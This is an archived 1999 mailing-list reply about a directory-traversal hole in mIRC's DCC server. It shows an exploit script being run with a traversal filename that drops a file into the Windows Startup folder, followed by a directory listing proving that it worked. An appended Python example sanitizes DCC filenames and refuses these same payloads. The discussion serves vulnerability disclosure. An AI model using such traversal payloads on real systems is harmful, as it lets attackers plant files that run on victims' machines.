Re: Mirc 5.5 'DCC Server' hole

From: Liam (redmageat_private)
Date: Mon Feb 01 1999 - 11:01:50 PST


    I have also tested the balu perl script which was posted, having
    results exactly opposite to what Thomas has found.  The only
    difference being I haven't tested it on an NT machine, however
    there are some important things to consider when using the script.
    
    Sending "C:\autoexec.bat" will not work for two reasons: in the hole
    described it was mentioned that mIRC does not filter the '.' or '\'
    characters, however this does not mean that it isn't going to
    filter the ':' character used to specify a drive.
    
    Although the script claims to send a fake filename breasts.jpg,
    if the mIRC victim chooses to maximize the DCC receive window
    they will see the following:
    
    Filename: breasts.jpg
    ..\..\..\..\..\autoexec.bat
    
    Which is another reason why you can't specify a drive letter.
    C:\WINDOWS>cd ..\..\..\..\E:\download
    Invalid directory
    
    Even if we omit the drive letter, there is no guarantee that the
    victim has installed mIRC on the C: drive.
    
    Also note, if you attempt to send a file which the person already has
    on their hard drive they will be presented with a dialog box
    'The file C:\autoexec.bat already exists'
    in which they may choose to overwrite, resume, or cancel.
    This defeats the purpose of sending a file breasts.jpg to get
    the person to accept.
    
    phear:~$./balu foo.bar.org RedMage ./evilfile.txt breasts.jpg
    'windows\startm~1\programs\startup\evilfile.txt'
    Nick of receiver: RedMage - Resume requested at offset: 0
    sending... done.
    phear:~$
    
    C:\WINDOWS> dir startm~1\programs\startup\e*.txt
    
     Volume in drive C is BOOT
     Volume Serial Number is 6396-30DC
     Directory of C:\WINDOWS\Start Menu\Programs\Startup
    
    EVILFI~1 TXT            22  02-01-99  1:53p evilfile.txt
             1 file(s)             22 bytes
             0 dir(s)     246,480,896 bytes free
    
    C:\WINDOWS>
    
    
    Hence it was successful and evilfile.txt will open each time
    the computer is rebooted.
    
    Not only is this successful, but it is successful on both
    mIRC 5.5 and mIRC 5.41.  I haven't tested it on any
    other versions, but earlier versions of mIRC are probably
    also vulnerable.
    
    - Liam
    
    >gate:~# ./balu foo.bar.org Nickname ./autoexec.bat breasts.jpg
    >"c:\autoexec.bat"
    >Nick of receiver: unavailable - Resume requested at offset:
    >Broken pipe
    >
    >Tried many other settings, mirc client under win95, running balu from another
    >host etc. Nothing happens.
    >
    >Thomas.
    
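The check a DCC receiver needs in order to close the hole discussed above, added here as an example and not code from this thread or from mIRC: the offered name is only ever used as a bare file name, and the final save path is proved to stay under the download directory. The download directory and the offered names are constructed to mirror the cases Liam walks through.

```python
"""Defensive handling of DCC SEND filenames of the kind abused against mIRC's
DCC server: refuse anything that is not a plain file name, then confirm the
resolved save path still lives inside the download directory.  ntpath is used
so Windows rules (both separators, drive letters) apply even on a Unix host."""
import ntpath
import re
from typing import Optional

_BAD_COMPONENTS = {"", ".", ".."}

# Constructed samples taken from the cases discussed in the thread.
SAMPLE_OFFERS = [
    "breasts.jpg",                                        # legitimate
    r"..\..\..\..\..\autoexec.bat",                       # traversal
    r"c:\autoexec.bat",                                   # drive letter
    r"windows\startm~1\programs\startup\evilfile.txt",    # into Startup
]


def sanitize_dcc_filename(offered: str) -> Optional[str]:
    """Return a safe bare file name, or None if the offer must be refused."""
    if not offered or "\x00" in offered:
        return None
    # A drive specifier ("c:") or UNC prefix means the sender is choosing
    # where the file lands rather than what it is called.
    drive, rest = ntpath.splitdrive(offered)
    if drive:
        return None
    # Split on both Windows separators: any directory part or '..' is refused,
    # which also hides 8.3 short names such as startm~1 from the sender.
    parts = re.split(r"[\\/]", rest)
    if len(parts) != 1 or parts[0].strip() in _BAD_COMPONENTS:
        return None
    return parts[0]


def resolve_dcc_target(download_dir: str, offered: str) -> Optional[str]:
    """Build the save path and prove it stays under download_dir."""
    name = sanitize_dcc_filename(offered)
    if name is None:
        return None
    root = ntpath.normpath(download_dir)
    target = ntpath.normpath(ntpath.join(root, name))
    # Even a name that passed sanitising must not escape the directory.
    if target == root or ntpath.commonpath([root, target]) != root:
        return None
    return target


def review_offers(download_dir: str = r"C:\mirc\download") -> dict:
    """Map each constructed offer to its accepted save path or None."""
    return {o: resolve_dcc_target(download_dir, o) for o in SAMPLE_OFFERS}
```

Only the first constructed offer resolves to a path; the other three are refused before any file is created, so the "already exists" dialog Liam mentions never comes into play.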



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:32:10 PDT